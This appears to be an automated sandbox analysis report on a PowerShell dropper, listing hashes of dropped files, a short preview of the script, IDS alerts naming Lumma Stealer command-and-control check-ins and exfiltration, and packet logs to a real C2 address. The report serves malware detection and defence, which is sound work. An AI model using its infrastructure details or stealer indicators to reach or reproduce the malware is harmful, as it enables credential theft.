                                                                                          Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2010 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>WWAN Service Group Policy Settings</displayName>.. <description>WWAN Service Group Policy Settings</description>.. <resources>.. <stringTable>.. <string id="WwanSvc_Category">WWAN Service</string>.. <string id="NetworkCost_Category">WWAN Media Cost</string>.. <string id="SetCost3G">Set 3G Cost</string>.. <string id="SetCost3G_Help">This policy setting configures the cost of 3G connections on the local machine.....If this policy setting is enabled, a drop-down list box presenting possible cost values will be active. Selecting one of the following values from the list will set the cost of all 3G connections on the local machine:....
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):2704792
                                                                                          Entropy (8bit):6.725743776039723
                                                                                          Encrypted:false
                                                                                          SSDEEP:49152:ImBYJtMTl/GuTvOCnCaYXWRTDF8fLen6yfZ0rO43PSGgt2:9OC9YXeTDFWD5PZ
                                                                                          MD5:449BF7A46490FA07881D969B6D52C0F1
                                                                                          SHA1:E520A8318E867C7840E6DEADEF36ABCDF2894417
                                                                                          SHA-256:5883D041C5F5020AC4B66314D5F89CB6331DB3C4EC1C912F72B3EBB9AA8C41E2
                                                                                          SHA-512:EABAA33B037BA9F1EE874C534D85AD281985E85E1DD2C115A2693F56381A9A596F22B16938916FD34804A3D490CD0AC53A2969C5F73A923B163C5474FEA91B91
                                                                                          Malicious:true
                                                                                          Antivirus:
                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:data
                                                                                          Category:dropped
                                                                                          Size (bytes):10717680
                                                                                          Entropy (8bit):6.282426578921538
                                                                                          Encrypted:false
                                                                                          SSDEEP:196608:WgPBhORiuQwCliXUxbblHa93Whli6Z26wO+:W8wkDliXUxbblHa93Whli6ZUF
                                                                                          MD5:74BDED81CE10A426DF54DA39CFA132FF
                                                                                          SHA1:EB26BCC7D24BE42BD8CFBDED53BD62D605989BBF
                                                                                          SHA-256:7BF96C193BEFBF23514401F8F6568076450ADE52DD1595B85E4DFCF3DE5F6FB9
                                                                                          SHA-512:BD7B7B52D31803B2D4B1FD8CB76481931ED8ABB98D779B893D3965231177BDD33386461E1A820B384712013904DA094E3CD15EE24A679DDC766132677A8BE54A
                                                                                          Malicious:false
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:data
                                                                                          Category:dropped
                                                                                          Size (bytes):613840
                                                                                          Entropy (8bit):5.353969995543054
                                                                                          Encrypted:false
                                                                                          SSDEEP:6144:ti2Cr/XgXBS/YKiMpN5zzivVsTRlWxYZbAIf+jL/k5nnPo7p1KFqUg/J6:tZCr/BzOvrYs1KgJ6
                                                                                          MD5:753BE41D649D31812067EC2B85C10F0E
                                                                                          SHA1:769531CC83B6D5DD9ABFECFA4C2D0C4128BF42F2
                                                                                          SHA-256:169FC7F80834ACF1D59B62C2ADBE6D1AD477CF2564EE84150DFFFD36CAA1CA33
                                                                                          SHA-512:86D76228FD82B09529D15D35B9BD45F7E0EA7328EA984FF9E0414A05746B7853DDB2AC8537A1D46B59F4A13F471120C3A428DF28FB51FC9FACC51C5F9EF6D497
                                                                                          Malicious:false
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):519944
                                                                                          Entropy (8bit):6.065481336711818
                                                                                          Encrypted:false
                                                                                          SSDEEP:12288:rnXnae2TPlr3zvzar5oRDaw92wP6mai9gs6CU:78lrT+r5ADakP4i9gsc
                                                                                          MD5:65839A5C28A0DEE380C4EBA54E2D941F
                                                                                          SHA1:AC609EA7F86FE533820B801CFE40B22F8A7A3F1B
                                                                                          SHA-256:C7A4C035D89716B027F69C2CC98EAF5C44FB15B08C2EA162D793466356A35A2A
                                                                                          SHA-512:E6853FF5D10D11B5333F0697DCB660A042EBEAE12EEBC84427D0B9F896CF100258E7E6D18F531AAE700C0F476F91F11DA0272E7809728DF68DA80EE560136AEB
                                                                                          Malicious:true
                                                                                          Antivirus:
                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):2598912
                                                                                          Entropy (8bit):6.604555317326718
                                                                                          Encrypted:false
                                                                                          SSDEEP:49152:5TFgiFpGXOENKRgjGkJsv6tWKFdu9C6TELyvL/6mShMZtmjNUVrciV5P+7QVg07M:5+iDaljxJsv6tWKFdu9CZgfn
                                                                                          MD5:17D26D22913C19D7A93F7F6AF7EC5D95
                                                                                          SHA1:0BBC1E108AF53990E4B9F2C34CBF7EFBE442BC92
                                                                                          SHA-256:E18684E62B3C076B91A776B71539A8B7640932055AE0831B73AD5FEE7C5DD4E7
                                                                                          SHA-512:FB2A4288BE915D7E62E6DCD1A4425A77C5DA69CC58DAA7F175B921FD017CDDB07F0D76C9016EB40475DEAD5DC7984B32B988AD6F5C5D14813B5A9E2867EB629A
                                                                                          Malicious:true
                                                                                          Antivirus:
                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):8581632
                                                                                          Entropy (8bit):6.736578346160889
                                                                                          Encrypted:false
                                                                                          SSDEEP:98304:YxRJATZlLne1/cF6ZWHxD1HFH+J+70msIWeiLtRgi3d4PJpTcSqxyr:YxiZBG2xpljTcJy
                                                                                          MD5:831BA3A8C9D9916BDF82E07A3E8338CC
                                                                                          SHA1:6C89FD258937427D14D5042736FDFCCD0049F042
                                                                                          SHA-256:D2C8C8B6CC783E4C00A5EF3365457D776DFC1205A346B676915E39D434F5A52D
                                                                                          SHA-512:BEDA57851E0E3781ECE1D0EE53A3F86C52BA99CB045943227B6C8FC1848A452269F2768BF4C661E27DDFBE436DF82CFD1DE54706D814F81797A13FEFEC4602C5
                                                                                          Malicious:true
                                                                                          Antivirus:
                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):1053696
                                                                                          Entropy (8bit):6.539052666912709
                                                                                          Encrypted:false
                                                                                          SSDEEP:12288:m+PpRNPe4+DZFvnwJ9o+Hllp59K03AskvvukLosiLHrv7F0YmIYunuGS:m+hRCZhwY+Hllp59OHvfo7HrCYmItnC
                                                                                          MD5:8A2E025FD3DDD56C8E4F63416E46E2EC
                                                                                          SHA1:5F58FEB11E84AA41D5548F5A30FC758221E9DD64
                                                                                          SHA-256:52AE07D1D6A467283055A3512D655B6A43A42767024E57279784701206D97003
                                                                                          SHA-512:8E3A449163E775DC000E9674BCA81FFABC7FECD9278DA5A40659620CFC9CC07F50CC29341E74176FE10717B2A12EA3D5148D1FFC906BC809B1CD5C8C59DE7BA1
                                                                                          Malicious:true
                                                                                          Antivirus:
                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):356352
                                                                                          Entropy (8bit):6.447802510709224
                                                                                          Encrypted:false
                                                                                          SSDEEP:6144:6gdDO1NTI8ew+Rh9CY8gjvXQ0AObEL9gqIL:6gda1FI8V+f9FFzA1IL
                                                                                          MD5:E9A9411D6F4C71095C996A406C56129D
                                                                                          SHA1:80B6EEFC488A1BF983919B440A83D3C02F0319DD
                                                                                          SHA-256:C9B2A31BFE75D1B25EFCC44E1DF773AB62D6D5C85EC5D0BC2DFE64129F8EAB5E
                                                                                          SHA-512:93BB3DD16DE56E8BED5AC8DA125681391C4E22F4941C538819AD4849913041F2E9BB807EB5570EE13DA167CFECD7A08D16AD133C244EB6D25F596073626CE8A2
                                                                                          Malicious:true
                                                                                          Antivirus:
                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):30512
                                                                                          Entropy (8bit):6.293166408242498
                                                                                          Encrypted:false
                                                                                          SSDEEP:384:37VPSe+T3KkTRIjjzi3WbR1zQnSyGUvXU7Ex3dVOSRZYNyb8E9VF6IYinAM+oaua:37VPSFTamMRbzCfzZQEpYinAMxJH4
                                                                                          MD5:F0739E1DB958FDE4DC6BAB9D75865191
                                                                                          SHA1:FEDADBF79B594995E6C44108D6B25CDBBF05EB65
                                                                                          SHA-256:27FAAC58C4EDC8FB147C9947FC9567AFD2F785B11252C2963788FD0F64F7CA42
                                                                                          SHA-512:ADBF2A0B42C6043EE5C984C02FCC8815B143117FA2EE0286B048F9E90D695F74F0129240E1DE36DEA2915F1E3D31359953095E6E5497337D01F0004D443AAD10
                                                                                          Malicious:true
                                                                                          Antivirus:
                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):3136432
                                                                                          Entropy (8bit):5.953248030549441
                                                                                          Encrypted:false
                                                                                          SSDEEP:49152:KQ96YdG5LJ3Z3k0jbdHMsChIiv1o/spNM:FqBkMGsCJe
                                                                                          MD5:CF83372CE8462708F58817B1560E7006
                                                                                          SHA1:6484FDC351661E0EC40FF6D8EF2D9C1DF2B05F1A
                                                                                          SHA-256:37A5A53B7D95439B05B5E4F394DE8B931A500F6DF97AAF1A82CB8A66C11478F2
                                                                                          SHA-512:D4D24CFE4819343A98D2C83F62B456E922FF88215015D6A76D230D4034B68AFBEF45E3FAD2B92B6D2DBFC2772B65C0BB91545B61BD0231C8A75C03A4146352D6
                                                                                          Malicious:true
                                                                                          Antivirus:
                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):6487736
                                                                                          Entropy (8bit):7.518089126573906
                                                                                          Encrypted:false
                                                                                          SSDEEP:98304:u4bRxuHuFP2rHLpHPA477yNRgoPbfnRROWR721LYfs17u0kcFrXLEJfwY:u4NxuOFI1AEyrbf/52BYfs1LkcFrXL+X
                                                                                          MD5:11C8962675B6D535C018A63BE0821E4C
                                                                                          SHA1:A150FA871E10919A1D626FFE37B1A400142F452B
                                                                                          SHA-256:421E36788BFCB4433178C657D49AA711446B3A783F7697A4D7D402A503C1F273
                                                                                          SHA-512:3973C23FC652E82F2415FF81F2756B55E46C6807CC4A8C37E5E31009CEC45AB47C5D4228C03B5E3A972CACD6547CF0D3273965F263B1B2D608AF89F5BE6E459A
                                                                                          Malicious:true
                                                                                          Antivirus:
                                                                                          • Antivirus: ReversingLabs, Detection: 3%
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):669792
                                                                                          Entropy (8bit):6.967035663118671
                                                                                          Encrypted:false
                                                                                          SSDEEP:12288:1/gzbnbASodCXNn5FJX5KrN9VmoBBDFDn8j:FRSoSn5FJX5KZ9VmoDKj
                                                                                          MD5:F75225DB13E3B86477DC8658C63F9B99
                                                                                          SHA1:6FFD5596FD69E161B788001ABAB195CC609476CF
                                                                                          SHA-256:4286CF3C1ED10B8D6E2794AB4ED1CFCDED0EA40D6794016CE926CD9B547C6A00
                                                                                          SHA-512:07DEE210DE39E9F303BB72558C4B2AEB5DE597638F0A5BFDCBE8F8BADFB46A45F7A1518726D543F18682214668D22586299159E2C3947A9285990867BC457327
                                                                                          Malicious:false
                                                                                          Antivirus:
                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):65856
                                                                                          Entropy (8bit):6.253138341040912
                                                                                          Encrypted:false
                                                                                          SSDEEP:1536:DyvHa8En7WFlzobIrmKD8owRaggg5TIcO3YDmj7Hx4:DyvHa8EnKFqKD8aK0jj6
                                                                                          MD5:760F24F0150A6E8DC15AC793C3172387
                                                                                          SHA1:920D5AAFB4B460EFC37B99564BD281E63C7EB647
                                                                                          SHA-256:E113F8593244C1BB5BCC73FEF0F93303C783714162CBD9EF93DDFF5709C037CE
                                                                                          SHA-512:E5251075164F9CDB154B0B5BF7B775C9720B0744D004B68CE6501A980342F45398505BC26F7CCA982BD23A03609B3C78510A5778A93041E7614E17B369A7209F
                                                                                          Malicious:true
                                                                                          Antivirus:
                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):146752
                                                                                          Entropy (8bit):6.209702529084155
                                                                                          Encrypted:false
                                                                                          SSDEEP:3072:8zWwFkpFMOKq9hC3ZWU+Oq1hZ+fVztxQ0rzc0to734o:s/zq9huqrZ+dbQIz1o
                                                                                          MD5:985F25C1D3144F37F046BC8F3E2B0C83
                                                                                          SHA1:C0B551C51317891D8220AB5A634C15ACF8223E88
                                                                                          SHA-256:3F71FA4C64376E85486B22DE926F61C3E3CDE3DE6C1D484E041F265534CCD623
                                                                                          SHA-512:B0DB2C878948922243CC80AB015A954B11C5E08FCE7DBE767722BC5082B150F277690ACF9DA1C657837E7A66059CAFA7BA76C3695BBA51B44467979F5A9C053B
                                                                                          Malicious:true
                                                                                          Antivirus:
                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:Atari 68xxx CPX file (version 4d53)
                                                                                          Category:dropped
                                                                                          Size (bytes):15400
                                                                                          Entropy (8bit):5.921776181449881
                                                                                          Encrypted:false
                                                                                          SSDEEP:192:/O3hRJxZvLMOOXgLaQPCDSupU5dwbADeQ6QirDde8QjbcRIo70xdF3yRLZ1XrRbP:gh5dLMOOUVu6gSeDWXo70d3yTJRb+K
                                                                                          MD5:744424FBBAC9BBA03E53DEA3587E327E
                                                                                          SHA1:B1CD89346897AA9A0787336B44E638E231B3CC15
                                                                                          SHA-256:E34C2C400FC112E079D825580F536EE43D5951F4DCA0C2C6C9C521CA609F09A5
                                                                                          SHA-512:7C2291B8E813EFD2C55D4D55620C435205848FCB3E0D7F8DC3153AFA7D6B4BCA7BBF80BB3F3732F850F80ADD87D8165DEEB3B94BC735A70E18509E276627E812
                                                                                          Malicious:false
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:data
                                                                                          Category:dropped
                                                                                          Size (bytes):798054
                                                                                          Entropy (8bit):7.892501542250156
                                                                                          Encrypted:false
                                                                                          SSDEEP:12288:TwzX9HIvQxLWZ+Q6znQ1VK5eTlVUQgEiG9UzV+RhmwhvpYmgDH/3:ghIvSWZ+RStN5B9MV+RhmeizP
                                                                                          MD5:150E5E57AE9177A2CD6E587DF2D3B0EA
                                                                                          SHA1:88C981FB86B2624165CD1FAB41F2C7CCEB57151F
                                                                                          SHA-256:1C11168B529642BA3139672E4DD6BE5B1CAB7A206F220554155AF997427D3DA8
                                                                                          SHA-512:361C1596782BB064169F8BA622838EE945CB83CA422FF3277EEBF574AC3E6257B7470A6705E0E4DA2E996971EC04A849BBB45F8D86181A4DB74B782A47814107
                                                                                          Malicious:false
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):421200
                                                                                          Entropy (8bit):6.59808962341698
                                                                                          Encrypted:false
                                                                                          SSDEEP:12288:iHEqYsrMWIqz473PTiPoH/aGhUgiW6QR7t5qv3Ooc8UHkC2eKq87:iH9YsIWIW4rPTiPofaDv3Ooc8UHkC2e8
                                                                                          MD5:03E9314004F504A14A61C3D364B62F66
                                                                                          SHA1:0AA3CAAC24FDF9D9D4C618E2BBF0A063036CD55D
                                                                                          SHA-256:A3BA6421991241BEA9C8334B62C3088F8F131AB906C3CC52113945D05016A35F
                                                                                          SHA-512:2FCFF4439D2759D93C57D49B24F28AE89B7698E284E76AC65FE2B50BDEFC23A8CC3C83891D671DE4E4C0F036CEF810856DE79AC2B028AA89A895BF35ABFF8C8D
                                                                                          Malicious:false
                                                                                          Antivirus:
                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):770384
                                                                                          Entropy (8bit):6.908020029901359
                                                                                          Encrypted:false
                                                                                          SSDEEP:12288:fQmCy3NeRjkpQmj3oaMtQqjoygfXq3kon9IlbgaOxQdVJJ6j5EBKX8hR5:ImCy3VQs9MtLjTgfa3kon9FaOdEz5
                                                                                          MD5:67EC459E42D3081DD8FD34356F7CAFC1
                                                                                          SHA1:1738050616169D5B17B5ADAC3FF0370B8C642734
                                                                                          SHA-256:1221A09484964A6F38AF5E34EE292B9AFEFCCB3DC6E55435FD3AAF7C235D9067
                                                                                          SHA-512:9ED1C106DF217E0B4E4FBD1F4275486CEBA1D8A225D6C7E47B854B0B5E6158135B81BE926F51DB0AD5C624F9BD1D09282332CF064680DC9F7D287073B9686D33
                                                                                          Malicious:false
                                                                                          Antivirus:
                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                          Category:dropped
                                                                                          Size (bytes):23383250
                                                                                          Entropy (8bit):7.998153646469816
                                                                                          Encrypted:true
                                                                                          SSDEEP:393216:ApfxCtjvxsixXiISDyrnzSKRfCcO2GJak83clI7ub4e1TgEg96a+njJpzwcjI1Pt:AhxKjvJQR8zdRfCcHI83T7ubr1T6wJp0
                                                                                          MD5:9745CEE6349AC275E7E375F0462BA48A
                                                                                          SHA1:DB8E2A5822E9123F3108FBAF4EF18E41914C2929
                                                                                          SHA-256:6632F3322CB604D2613241185163EBA61776618247A9D247A41A8EFE6762B4B0
                                                                                          SHA-512:87FD6EE881166D5DCF15069D2D9AD49FD1EEA9952A1D270CC2DBB33DECFEE6E1CC0F9BCD9C2D7B171BDB35840ADEAAE1F31D913DC2E5BBB13213FA9F8F8CFAE7
                                                                                          Malicious:false
                                                                                          File type:ASCII text, with very long lines (65265), with CRLF line terminators
                                                                                          Entropy (8bit):5.998971392852043
                                                                                          TrID:
                                                                                            File name:IaslcsMo.ps1
                                                                                            File size:31'179'107 bytes
                                                                                            MD5:d7c9613ed12144aea20bee90fd5057e5
                                                                                            SHA1:268f3d77e4b82f68c842a4c01f96a6ba864c09fb
                                                                                            SHA256:aa22e017141e1c5974e00c72f2de158072cf9279cfedff86ac1734c6947a19e8
                                                                                            SHA512:e4a89e623561f5b8434cabb5aaa2cef9d15bdff3f791029dbae8d017c8027928efec9371300b55ad5edde394673ba9c2a0ccac56f7996f69324010f55c30f77b
                                                                                            SSDEEP:49152:TUfvkgL6E9gTSTWi6fMJyDHol83vPi037qiLya6YWBJacr69CKwmxJUEqw2cl3+2:1
                                                                                            TLSH:946733305E9A3DBE476C8329707F6F1D1FB01F96888CB4DB439475C712AAB80992786D
                                                                                            File Content Preview:.. $cNbGytXJ = "Stop".. Set-Location $Env:AppData.. $avOQhqfd = "$Env:AppData\VWPGdipf".. if (Test-Path $avOQhqfd) {.. if (Test-Path "$Env:AppData\RYJmNlDd.txt") {.. Remove-Item "$Env:AppData\RYJmNlDd.txt".. }..
                                                                                            Icon Hash:3270d6baae77db44
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-11-25T10:54:27.181198+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49736 | 104.21.2.224 | 443 | TCP
2024-11-25T10:54:27.904326+0100 | 2049836 | ET MALWARE Lumma Stealer Related Activity | 1 | 192.168.2.4 | 49736 | 104.21.2.224 | 443 | TCP
2024-11-25T10:54:27.904326+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.4 | 49736 | 104.21.2.224 | 443 | TCP
2024-11-25T10:54:29.847246+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49737 | 104.21.2.224 | 443 | TCP
2024-11-25T10:54:30.605000+0100 | 2049812 | ET MALWARE Lumma Stealer Related Activity M2 | 1 | 192.168.2.4 | 49737 | 104.21.2.224 | 443 | TCP
2024-11-25T10:54:30.605000+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.4 | 49737 | 104.21.2.224 | 443 | TCP
2024-11-25T10:54:32.277939+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49738 | 104.21.2.224 | 443 | TCP
2024-11-25T10:54:34.691302+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49739 | 104.21.2.224 | 443 | TCP
2024-11-25T10:54:37.092994+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49740 | 104.21.2.224 | 443 | TCP
2024-11-25T10:54:40.740867+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49741 | 104.21.2.224 | 443 | TCP
2024-11-25T10:54:42.656039+0100 | 2048094 | ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration | 1 | 192.168.2.4 | 49741 | 104.21.2.224 | 443 | TCP
2024-11-25T10:54:44.455907+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49743 | 104.21.2.224 | 443 | TCP
2024-11-25T10:54:48.033683+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49755 | 104.21.2.224 | 443 | TCP
2024-11-25T10:54:48.760831+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.4 | 49755 | 104.21.2.224 | 443 | TCP
2024-11-25T10:54:50.166527+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49761 | 172.67.75.40 | 443 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                                            Nov 25, 2024 10:54:27.904417038 CET44349736104.21.2.224192.168.2.4
                                                                                            Nov 25, 2024 10:54:27.904484987 CET49736443192.168.2.4104.21.2.224
                                                                                            Nov 25, 2024 10:54:27.914217949 CET49736443192.168.2.4104.21.2.224
                                                                                            Nov 25, 2024 10:54:27.914236069 CET44349736104.21.2.224192.168.2.4
                                                                                            Nov 25, 2024 10:54:28.540906906 CET49737443192.168.2.4104.21.2.224
                                                                                            Nov 25, 2024 10:54:28.540956974 CET44349737104.21.2.224192.168.2.4
                                                                                            Nov 25, 2024 10:54:28.541049004 CET49737443192.168.2.4104.21.2.224
                                                                                            Nov 25, 2024 10:54:28.541307926 CET49737443192.168.2.4104.21.2.224
                                                                                            Nov 25, 2024 10:54:28.541320086 CET44349737104.21.2.224192.168.2.4
                                                                                            Nov 25, 2024 10:54:29.847184896 CET44349737104.21.2.224192.168.2.4
                                                                                            Nov 25, 2024 10:54:29.847245932 CET49737443192.168.2.4104.21.2.224
                                                                                            Nov 25, 2024 10:54:29.859668970 CET49737443192.168.2.4104.21.2.224
                                                                                            Nov 25, 2024 10:54:29.859690905 CET44349737104.21.2.224192.168.2.4
                                                                                            Nov 25, 2024 10:54:29.859970093 CET44349737104.21.2.224192.168.2.4
                                                                                            Nov 25, 2024 10:54:29.861190081 CET49737443192.168.2.4104.21.2.224
                                                                                            Nov 25, 2024 10:54:29.861211061 CET49737443192.168.2.4104.21.2.224
                                                                                            Nov 25, 2024 10:54:29.861257076 CET44349737104.21.2.224192.168.2.4
                                                                                            Nov 25, 2024 10:54:30.605001926 CET44349737104.21.2.224192.168.2.4
                                                                                            Nov 25, 2024 10:54:30.605067968 CET44349737104.21.2.224192.168.2.4
                                                                                            Nov 25, 2024 10:54:30.605094910 CET44349737104.21.2.224192.168.2.4
                                                                                            Nov 25, 2024 10:54:30.605108976 CET49737443192.168.2.4104.21.2.224
                                                                                            Nov 25, 2024 10:54:30.605135918 CET44349737104.21.2.224192.168.2.4
                                                                                            Nov 25, 2024 10:54:30.605180979 CET49737443192.168.2.4104.21.2.224
                                                                                            Nov 25, 2024 10:54:30.605189085 CET44349737104.21.2.224192.168.2.4
                                                                                            Nov 25, 2024 10:54:30.621495008 CET44349737104.21.2.224192.168.2.4
                                                                                            Nov 25, 2024 10:54:30.621570110 CET49737443192.168.2.4104.21.2.224
                                                                                            Nov 25, 2024 10:54:30.621592045 CET44349737104.21.2.224192.168.2.4
                                                                                            Nov 25, 2024 10:54:30.629775047 CET44349737104.21.2.224192.168.2.4
                                                                                            Nov 25, 2024 10:54:30.629833937 CET49737443192.168.2.4104.21.2.224
                                                                                            Nov 25, 2024 10:54:30.629852057 CET44349737104.21.2.224192.168.2.4
                                                                                            Nov 25, 2024 10:54:30.724734068 CET44349737104.21.2.224192.168.2.4
                                                                                            Nov 25, 2024 10:54:30.724777937 CET44349737104.21.2.224192.168.2.4
                                                                                            Nov 25, 2024 10:54:30.724790096 CET49737443192.168.2.4104.21.2.224
                                                                                            Nov 25, 2024 10:54:30.724809885 CET44349737104.21.2.224192.168.2.4
                                                                                            Nov 25, 2024 10:54:30.724860907 CET49737443192.168.2.4104.21.2.224
                                                                                            Nov 25, 2024 10:54:30.815308094 CET44349737104.21.2.224192.168.2.4
                                                                                            Nov 25, 2024 10:54:30.815448046 CET44349737104.21.2.224192.168.2.4
                                                                                            Nov 25, 2024 10:54:30.815507889 CET49737443192.168.2.4104.21.2.224
                                                                                            Nov 25, 2024 10:54:30.815963984 CET49737443192.168.2.4104.21.2.224
                                                                                            Nov 25, 2024 10:54:30.815985918 CET44349737104.21.2.224192.168.2.4
                                                                                            Nov 25, 2024 10:54:30.815999031 CET49737443192.168.2.4104.21.2.224
                                                                                            Nov 25, 2024 10:54:30.816015005 CET44349737104.21.2.224192.168.2.4
                                                                                            Nov 25, 2024 10:54:30.997019053 CET49738443192.168.2.4104.21.2.224
                                                                                            Nov 25, 2024 10:54:30.997072935 CET44349738104.21.2.224192.168.2.4
                                                                                            Nov 25, 2024 10:54:30.997143030 CET49738443192.168.2.4104.21.2.224
                                                                                            Nov 25, 2024 10:54:31.011656046 CET49738443192.168.2.4104.21.2.224
                                                                                            Nov 25, 2024 10:54:31.011693954 CET44349738104.21.2.224192.168.2.4
                                                                                            Nov 25, 2024 10:54:32.277856112 CET44349738104.21.2.224192.168.2.4
                                                                                            Nov 25, 2024 10:54:32.277939081 CET49738443192.168.2.4104.21.2.224
                                                                                            Nov 25, 2024 10:54:32.280472040 CET49738443192.168.2.4104.21.2.224
                                                                                            Nov 25, 2024 10:54:32.280482054 CET44349738104.21.2.224192.168.2.4
                                                                                            Nov 25, 2024 10:54:32.280682087 CET44349738104.21.2.224192.168.2.4
                                                                                            Nov 25, 2024 10:54:32.288184881 CET49738443192.168.2.4104.21.2.224
                                                                                            Nov 25, 2024 10:54:32.291695118 CET49738443192.168.2.4104.21.2.224
                                                                                            Nov 25, 2024 10:54:32.291729927 CET44349738104.21.2.224192.168.2.4
                                                                                            Nov 25, 2024 10:54:32.294511080 CET49738443192.168.2.4104.21.2.224
                                                                                            Nov 25, 2024 10:54:32.294521093 CET44349738104.21.2.224192.168.2.4
                                                                                            Nov 25, 2024 10:54:33.158160925 CET44349738104.21.2.224192.168.2.4
                                                                                            Nov 25, 2024 10:54:33.158268929 CET44349738104.21.2.224192.168.2.4
                                                                                            Nov 25, 2024 10:54:33.158327103 CET49738443192.168.2.4104.21.2.224
                                                                                            Nov 25, 2024 10:54:33.159985065 CET49738443192.168.2.4104.21.2.224
                                                                                            Nov 25, 2024 10:54:33.160001040 CET44349738104.21.2.224192.168.2.4
                                                                                            Nov 25, 2024 10:54:33.387063026 CET49739443192.168.2.4104.21.2.224
                                                                                            Nov 25, 2024 10:54:33.387123108 CET44349739104.21.2.224192.168.2.4
